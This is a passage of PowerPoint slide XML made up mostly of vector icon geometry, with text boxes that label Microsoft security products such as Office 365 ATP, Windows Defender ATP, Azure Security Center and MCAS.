                <a:ext cx="144463" cy="219075"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 30 w 488"/>
                  <a:gd name="T1" fmla="*/ 11 h 739"/>
                  <a:gd name="T2" fmla="*/ 30 w 488"/>
                  <a:gd name="T3" fmla="*/ 0 h 739"/>
                  <a:gd name="T4" fmla="*/ 286 w 488"/>
                  <a:gd name="T5" fmla="*/ 345 h 739"/>
                  <a:gd name="T6" fmla="*/ 471 w 488"/>
                  <a:gd name="T7" fmla="*/ 554 h 739"/>
                  <a:gd name="T8" fmla="*/ 457 w 488"/>
                  <a:gd name="T9" fmla="*/ 739 h 739"/>
                  <a:gd name="T10" fmla="*/ 448 w 488"/>
                  <a:gd name="T11" fmla="*/ 734 h 739"/>
                  <a:gd name="T12" fmla="*/ 448 w 488"/>
                  <a:gd name="T13" fmla="*/ 731 h 739"/>
                  <a:gd name="T14" fmla="*/ 455 w 488"/>
                  <a:gd name="T15" fmla="*/ 702 h 739"/>
                  <a:gd name="T16" fmla="*/ 437 w 488"/>
                  <a:gd name="T17" fmla="*/ 573 h 739"/>
                  <a:gd name="T18" fmla="*/ 286 w 488"/>
                  <a:gd name="T19" fmla="*/ 459 h 739"/>
                  <a:gd name="T20" fmla="*/ 75 w 488"/>
                  <a:gd name="T21" fmla="*/ 550 h 739"/>
                  <a:gd name="T22" fmla="*/ 73 w 488"/>
                  <a:gd name="T23" fmla="*/ 552 h 739"/>
                  <a:gd name="T24" fmla="*/ 47 w 488"/>
                  <a:gd name="T25" fmla="*/ 537 h 739"/>
                  <a:gd name="T26" fmla="*/ 50 w 488"/>
                  <a:gd name="T27" fmla="*/ 517 h 739"/>
                  <a:gd name="T28" fmla="*/ 3 w 488"/>
                  <a:gd name="T29" fmla="*/ 457 h 739"/>
                  <a:gd name="T30" fmla="*/ 0 w 488"/>
                  <a:gd name="T31" fmla="*/ 454 h 739"/>
                  <a:gd name="T32" fmla="*/ 0 w 488"/>
                  <a:gd name="T33" fmla="*/ 426 h 739"/>
                  <a:gd name="T34" fmla="*/ 163 w 488"/>
                  <a:gd name="T35" fmla="*/ 334 h 739"/>
                  <a:gd name="T36" fmla="*/ 200 w 488"/>
                  <a:gd name="T37" fmla="*/ 211 h 739"/>
                  <a:gd name="T38" fmla="*/ 30 w 488"/>
                  <a:gd name="T39" fmla="*/ 1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739">
                    <a:moveTo>
                      <a:pt x="30" y="11"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="7"/>
                      <a:pt x="30" y="4"/>
                      <a:pt x="30" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="188" y="20"/>
                      <a:pt x="314" y="170"/>
                      <a:pt x="286" y="345"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="381" y="385"/>
                      <a:pt x="445" y="453"/>
                      <a:pt x="471" y="554"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="488" y="623"/>
                      <a:pt x="477" y="690"/>
                      <a:pt x="457" y="739"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="454" y="737"/>
                      <a:pt x="451" y="735"/>
                      <a:pt x="448" y="734"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="448" y="733"/>
                      <a:pt x="448" y="732"/>
                      <a:pt x="448" y="731"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="450" y="721"/>
                      <a:pt x="453" y="712"/>
                      <a:pt x="455" y="702"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="463" y="657"/>
                      <a:pt x="457" y="613"/>
                      <a:pt x="437" y="573"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="405" y="510"/>
                      <a:pt x="355" y="472"/>
                      <a:pt x="286" y="459"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="203" y="444"/>
                      <a:pt x="121" y="480"/>
                      <a:pt x="75" y="550"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="550"/>
                      <a:pt x="74" y="551"/>
                      <a:pt x="73" y="552"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="547"/>
                      <a:pt x="56" y="542"/>
                      <a:pt x="47" y="537"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="530"/>
                      <a:pt x="50" y="524"/>
                      <a:pt x="50" y="517"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="488"/>
                      <a:pt x="31" y="463"/>
                      <a:pt x="3" y="457"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="457"/>
                      <a:pt x="0" y="456"/>
                      <a:pt x="0" y="454"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="445"/>
                      <a:pt x="0" y="435"/>
                      <a:pt x="0" y="426"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="421"/>
                      <a:pt x="124" y="391"/>
                      <a:pt x="163" y="334"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="189" y="297"/>
                      <a:pt x="201" y="256"/>
                      <a:pt x="200" y="211"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="197" y="108"/>
                      <a:pt x="121" y="28"/>
                      <a:pt x="30"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7"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="693738" y="1898650"/>
                <a:ext cx="254000" cy="109538"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 853 w 853"/>
                  <a:gd name="T1" fmla="*/ 254 h 372"/>
                  <a:gd name="T2" fmla="*/ 775 w 853"/>
                  <a:gd name="T3" fmla="*/ 325 h 372"/>
                  <a:gd name="T4" fmla="*/ 665 w 853"/>
                  <a:gd name="T5" fmla="*/ 366 h 372"/>
                  <a:gd name="T6" fmla="*/ 585 w 853"/>
                  <a:gd name="T7" fmla="*/ 368 h 372"/>
                  <a:gd name="T8" fmla="*/ 428 w 853"/>
                  <a:gd name="T9" fmla="*/ 303 h 372"/>
                  <a:gd name="T10" fmla="*/ 424 w 853"/>
                  <a:gd name="T11" fmla="*/ 304 h 372"/>
                  <a:gd name="T12" fmla="*/ 307 w 853"/>
                  <a:gd name="T13" fmla="*/ 362 h 372"/>
                  <a:gd name="T14" fmla="*/ 206 w 853"/>
                  <a:gd name="T15" fmla="*/ 368 h 372"/>
                  <a:gd name="T16" fmla="*/ 10 w 853"/>
                  <a:gd name="T17" fmla="*/ 266 h 372"/>
                  <a:gd name="T18" fmla="*/ 0 w 853"/>
                  <a:gd name="T19" fmla="*/ 254 h 372"/>
                  <a:gd name="T20" fmla="*/ 10 w 853"/>
                  <a:gd name="T21" fmla="*/ 248 h 372"/>
                  <a:gd name="T22" fmla="*/ 150 w 853"/>
                  <a:gd name="T23" fmla="*/ 319 h 372"/>
                  <a:gd name="T24" fmla="*/ 286 w 853"/>
                  <a:gd name="T25" fmla="*/ 284 h 372"/>
                  <a:gd name="T26" fmla="*/ 370 w 853"/>
                  <a:gd name="T27" fmla="*/ 162 h 372"/>
                  <a:gd name="T28" fmla="*/ 354 w 853"/>
                  <a:gd name="T29" fmla="*/ 15 h 372"/>
                  <a:gd name="T30" fmla="*/ 380 w 853"/>
                  <a:gd name="T31" fmla="*/ 0 h 372"/>
                  <a:gd name="T32" fmla="*/ 426 w 853"/>
                  <a:gd name="T33" fmla="*/ 21 h 372"/>
                  <a:gd name="T34" fmla="*/ 473 w 853"/>
                  <a:gd name="T35" fmla="*/ 0 h 372"/>
                  <a:gd name="T36" fmla="*/ 499 w 853"/>
                  <a:gd name="T37" fmla="*/ 15 h 372"/>
                  <a:gd name="T38" fmla="*/ 490 w 853"/>
                  <a:gd name="T39" fmla="*/ 35 h 372"/>
                  <a:gd name="T40" fmla="*/ 477 w 853"/>
                  <a:gd name="T41" fmla="*/ 132 h 372"/>
                  <a:gd name="T42" fmla="*/ 640 w 853"/>
                  <a:gd name="T43" fmla="*/ 315 h 372"/>
                  <a:gd name="T44" fmla="*/ 841 w 853"/>
                  <a:gd name="T45" fmla="*/ 250 h 372"/>
                  <a:gd name="T46" fmla="*/ 846 w 853"/>
                  <a:gd name="T47" fmla="*/ 250 h 372"/>
                  <a:gd name="T48" fmla="*/ 853 w 853"/>
                  <a:gd name="T49" fmla="*/ 25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3" h="372">
                    <a:moveTo>
                      <a:pt x="853" y="254"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="831" y="282"/>
                      <a:pt x="805" y="306"/>
                      <a:pt x="775" y="325"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="741" y="346"/>
                      <a:pt x="704" y="359"/>
                      <a:pt x="665" y="366"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="639" y="370"/>
                      <a:pt x="612" y="371"/>
                      <a:pt x="585" y="368"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="527" y="362"/>
                      <a:pt x="474" y="340"/>
                      <a:pt x="428" y="303"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="427" y="302"/>
                      <a:pt x="426" y="302"/>
                      <a:pt x="424" y="304"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="390" y="332"/>
                      <a:pt x="350" y="351"/>
                      <a:pt x="307" y="362"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="273" y="370"/>
                      <a:pt x="240" y="372"/>
                      <a:pt x="206" y="368"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="359"/>
                      <a:pt x="62" y="325"/>
                      <a:pt x="10" y="266"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="262"/>
                      <a:pt x="3" y="258"/>
                      <a:pt x="0" y="254"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="252"/>
                      <a:pt x="7" y="250"/>
                      <a:pt x="10" y="248"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="290"/>
                      <a:pt x="94" y="315"/>
                      <a:pt x="150" y="319"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="200" y="324"/>
                      <a:pt x="245" y="312"/>
                      <a:pt x="286" y="284"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="329" y="254"/>
                      <a:pt x="358" y="213"/>
                      <a:pt x="370" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="383" y="111"/>
                      <a:pt x="377" y="62"/>
                      <a:pt x="354" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="363" y="10"/>
                      <a:pt x="371" y="5"/>
                      <a:pt x="380" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="393" y="14"/>
                      <a:pt x="408" y="21"/>
                      <a:pt x="426" y="21"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="445" y="21"/>
                      <a:pt x="460" y="14"/>
                      <a:pt x="473" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="482" y="5"/>
                      <a:pt x="490" y="10"/>
                      <a:pt x="499" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="496" y="22"/>
                      <a:pt x="493" y="28"/>
                      <a:pt x="490" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="478" y="66"/>
                      <a:pt x="474" y="98"/>
                      <a:pt x="477" y="132"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="486" y="222"/>
                      <a:pt x="551" y="295"/>
                      <a:pt x="640" y="315"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="713" y="332"/>
                      <a:pt x="791" y="307"/>
                      <a:pt x="841" y="250"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="843" y="248"/>
                      <a:pt x="844" y="248"/>
                      <a:pt x="846" y="250"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="848" y="251"/>
                      <a:pt x="850" y="252"/>
                      <a:pt x="853" y="2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8"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="842963" y="1874838"/>
                <a:ext cx="60325" cy="85725"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 25 w 206"/>
                  <a:gd name="T1" fmla="*/ 291 h 291"/>
                  <a:gd name="T2" fmla="*/ 0 w 206"/>
                  <a:gd name="T3" fmla="*/ 226 h 291"/>
                  <a:gd name="T4" fmla="*/ 99 w 206"/>
                  <a:gd name="T5" fmla="*/ 140 h 291"/>
                  <a:gd name="T6" fmla="*/ 124 w 206"/>
                  <a:gd name="T7" fmla="*/ 11 h 291"/>
                  <a:gd name="T8" fmla="*/ 127 w 206"/>
                  <a:gd name="T9" fmla="*/ 10 h 291"/>
                  <a:gd name="T10" fmla="*/ 190 w 206"/>
                  <a:gd name="T11" fmla="*/ 1 h 291"/>
                  <a:gd name="T12" fmla="*/ 193 w 206"/>
                  <a:gd name="T13" fmla="*/ 3 h 291"/>
                  <a:gd name="T14" fmla="*/ 99 w 206"/>
                  <a:gd name="T15" fmla="*/ 247 h 291"/>
                  <a:gd name="T16" fmla="*/ 25 w 206"/>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91">
                    <a:moveTo>
                      <a:pt x="25" y="291"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="271"/>
                      <a:pt x="4" y="249"/>
                      <a:pt x="0" y="226"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="209"/>
                      <a:pt x="76" y="180"/>
                      <a:pt x="99" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="100"/>
                      <a:pt x="130" y="57"/>
                      <a:pt x="124" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="125" y="11"/>
                      <a:pt x="126" y="10"/>
                      <a:pt x="127" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="147" y="3"/>
                      <a:pt x="168" y="0"/>
                      <a:pt x="190" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="192" y="1"/>
                      <a:pt x="193" y="1"/>
                      <a:pt x="193" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="206" y="96"/>
                      <a:pt x="170" y="187"/>
                      <a:pt x="99" y="247"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="266"/>
                      <a:pt x="52" y="280"/>
                      <a:pt x="25" y="2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9"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="739775" y="1874838"/>
                <a:ext cx="58738" cy="85725"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 73 w 197"/>
                  <a:gd name="T1" fmla="*/ 11 h 291"/>
                  <a:gd name="T2" fmla="*/ 98 w 197"/>
                  <a:gd name="T3" fmla="*/ 140 h 291"/>
                  <a:gd name="T4" fmla="*/ 197 w 197"/>
                  <a:gd name="T5" fmla="*/ 226 h 291"/>
                  <a:gd name="T6" fmla="*/ 172 w 197"/>
                  <a:gd name="T7" fmla="*/ 291 h 291"/>
                  <a:gd name="T8" fmla="*/ 170 w 197"/>
                  <a:gd name="T9" fmla="*/ 290 h 291"/>
                  <a:gd name="T10" fmla="*/ 8 w 197"/>
                  <a:gd name="T11" fmla="*/ 97 h 291"/>
                  <a:gd name="T12" fmla="*/ 4 w 197"/>
                  <a:gd name="T13" fmla="*/ 3 h 291"/>
                  <a:gd name="T14" fmla="*/ 6 w 197"/>
                  <a:gd name="T15" fmla="*/ 1 h 291"/>
                  <a:gd name="T16" fmla="*/ 73 w 197"/>
                  <a:gd name="T17" fmla="*/ 11 h 291"/>
                  <a:gd name="T18" fmla="*/ 73 w 197"/>
                  <a:gd name="T19" fmla="*/ 1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91">
                    <a:moveTo>
                      <a:pt x="73" y="11"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="57"/>
                      <a:pt x="75" y="100"/>
                      <a:pt x="98" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="180"/>
                      <a:pt x="155" y="208"/>
                      <a:pt x="197" y="226"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="197" y="239"/>
                      <a:pt x="183" y="275"/>
                      <a:pt x="172" y="291"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="171" y="290"/>
                      <a:pt x="170" y="290"/>
                      <a:pt x="170" y="290"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="253"/>
                      <a:pt x="29" y="188"/>
                      <a:pt x="8" y="97"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="66"/>
                      <a:pt x="0" y="34"/>
                      <a:pt x="4" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="1"/>
                      <a:pt x="5" y="1"/>
                      <a:pt x="6" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="0"/>
                      <a:pt x="51" y="4"/>
                      <a:pt x="73" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="11"/>
                      <a:pt x="73" y="11"/>
                      <a:pt x="73"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10"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="771525" y="1800225"/>
                <a:ext cx="98425" cy="39688"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 43 w 335"/>
                  <a:gd name="T1" fmla="*/ 136 h 136"/>
                  <a:gd name="T2" fmla="*/ 0 w 335"/>
                  <a:gd name="T3" fmla="*/ 81 h 136"/>
                  <a:gd name="T4" fmla="*/ 335 w 335"/>
                  <a:gd name="T5" fmla="*/ 81 h 136"/>
                  <a:gd name="T6" fmla="*/ 292 w 335"/>
                  <a:gd name="T7" fmla="*/ 135 h 136"/>
                  <a:gd name="T8" fmla="*/ 167 w 335"/>
                  <a:gd name="T9" fmla="*/ 92 h 136"/>
                  <a:gd name="T10" fmla="*/ 43 w 335"/>
                  <a:gd name="T11" fmla="*/ 136 h 136"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T10" y="T11"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="335" h="136">
                    <a:moveTo>
                      <a:pt x="43" y="136"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="120"/>
                      <a:pt x="11" y="102"/>
                      <a:pt x="0" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="6"/>
                      <a:pt x="234" y="0"/>
                      <a:pt x="335" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="330" y="93"/>
                      <a:pt x="306" y="124"/>
                      <a:pt x="292" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="255" y="107"/>
                      <a:pt x="214" y="92"/>
                      <a:pt x="167" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="92"/>
                      <a:pt x="80" y="107"/>
                      <a:pt x="43" y="1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2" name="Rectangle 41"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="274637" y="3344863"/>
              <a:ext cx="7630367" cy="1118006"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx2">
                <a:alpha val="38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TextBox 42"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="442930" y="3861327"/>
              <a:ext cx="1058623" cy="586314"/>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OFFICE 365</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ATP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="TextBox 43"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1733617" y="3861327"/>
              <a:ext cx="1300677" cy="586314"/>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WINDOWS</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DEFENDER ATP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="TextBox 44"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3266358" y="3861327"/>
              <a:ext cx="1414490" cy="586314"/>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AZURE SECURITY</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CENTER</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="TextBox 45"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4912912" y="3861327"/>
              <a:ext cx="1589218" cy="586314"/>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ADVANCED</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THREAT ANALYTICS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="TextBox 46"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6864836" y="3934039"/>
              <a:ext cx="741230" cy="440890"/>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MCAS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="66" name="Group 65"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3724143" y="3555516"/>
              <a:ext cx="498922" cy="348046"/>
              <a:chOff x="3279930" y="3368676"/>
              <a:chExt cx="597781" cy="417008"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="50" name="Freeform 30"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3496272" y="3467990"/>
                <a:ext cx="165096" cy="218380"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 96 w 96"/>
                  <a:gd name="T1" fmla="*/ 56 h 128"/>
                  <a:gd name="T2" fmla="*/ 84 w 96"/>
                  <a:gd name="T3" fmla="*/ 56 h 128"/>
                  <a:gd name="T4" fmla="*/ 84 w 96"/>
                  <a:gd name="T5" fmla="*/ 36 h 128"/>
                  <a:gd name="T6" fmla="*/ 48 w 96"/>
                  <a:gd name="T7" fmla="*/ 0 h 128"/>
                  <a:gd name="T8" fmla="*/ 12 w 96"/>
                  <a:gd name="T9" fmla="*/ 36 h 128"/>
                  <a:gd name="T10" fmla="*/ 12 w 96"/>
                  <a:gd name="T11" fmla="*/ 56 h 128"/>
                  <a:gd name="T12" fmla="*/ 0 w 96"/>
                  <a:gd name="T13" fmla="*/ 56 h 128"/>
                  <a:gd name="T14" fmla="*/ 0 w 96"/>
                  <a:gd name="T15" fmla="*/ 128 h 128"/>
                  <a:gd name="T16" fmla="*/ 96 w 96"/>
                  <a:gd name="T17" fmla="*/ 128 h 128"/>
                  <a:gd name="T18" fmla="*/ 96 w 96"/>
                  <a:gd name="T19" fmla="*/ 56 h 128"/>
                  <a:gd name="T20" fmla="*/ 20 w 96"/>
                  <a:gd name="T21" fmla="*/ 36 h 128"/>
                  <a:gd name="T22" fmla="*/ 48 w 96"/>
                  <a:gd name="T23" fmla="*/ 8 h 128"/>
                  <a:gd name="T24" fmla="*/ 76 w 96"/>
                  <a:gd name="T25" fmla="*/ 36 h 128"/>
                  <a:gd name="T26" fmla="*/ 76 w 96"/>
                  <a:gd name="T27" fmla="*/ 56 h 128"/>
                  <a:gd name="T28" fmla="*/ 20 w 96"/>
                  <a:gd name="T29" fmla="*/ 56 h 128"/>
                  <a:gd name="T30" fmla="*/ 20 w 96"/>
                  <a:gd name="T31" fmla="*/ 36 h 128"/>
                  <a:gd name="T32" fmla="*/ 88 w 96"/>
                  <a:gd name="T33" fmla="*/ 120 h 128"/>
                  <a:gd name="T34" fmla="*/ 8 w 96"/>
                  <a:gd name="T35" fmla="*/ 120 h 128"/>
                  <a:gd name="T36" fmla="*/ 8 w 96"/>
                  <a:gd name="T37" fmla="*/ 64 h 128"/>
                  <a:gd name="T38" fmla="*/ 88 w 96"/>
                  <a:gd name="T39" fmla="*/ 64 h 128"/>
                  <a:gd name="T40" fmla="*/ 88 w 96"/>
                  <a:gd name="T41"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28">
                    <a:moveTo>
                      <a:pt x="96" y="56"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="84" y="56"/>
                      <a:pt x="84" y="56"/>
                      <a:pt x="84" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="84" y="36"/>
                      <a:pt x="84" y="36"/>
                      <a:pt x="84" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="84" y="16"/>
                      <a:pt x="68" y="0"/>
                      <a:pt x="48" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="0"/>
                      <a:pt x="12" y="16"/>
                      <a:pt x="12" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="56"/>
                      <a:pt x="12" y="56"/>
                      <a:pt x="12" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="56"/>
                      <a:pt x="0" y="56"/>
                      <a:pt x="0" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="128"/>
                      <a:pt x="0" y="128"/>
                      <a:pt x="0" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="96" y="128"/>
                      <a:pt x="96" y="128"/>
                      <a:pt x="96" y="128"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="96" y="56"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="20" y="36"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="21"/>
                      <a:pt x="33" y="8"/>
                      <a:pt x="48" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="8"/>
                      <a:pt x="76" y="21"/>
                      <a:pt x="76" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="56"/>
                      <a:pt x="76" y="56"/>
                      <a:pt x="76" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="56"/>
                      <a:pt x="20" y="56"/>
                      <a:pt x="20" y="56"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="20" y="36"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="88" y="120"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="120"/>
                      <a:pt x="8" y="120"/>
                      <a:pt x="8" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="64"/>
                      <a:pt x="8" y="64"/>
                      <a:pt x="8" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="88" y="64"/>
                      <a:pt x="88" y="64"/>
                      <a:pt x="88" y="64"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="88" y="1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34"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3279930" y="3368676"/>
                <a:ext cx="597781" cy="417008"/>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solidFill>
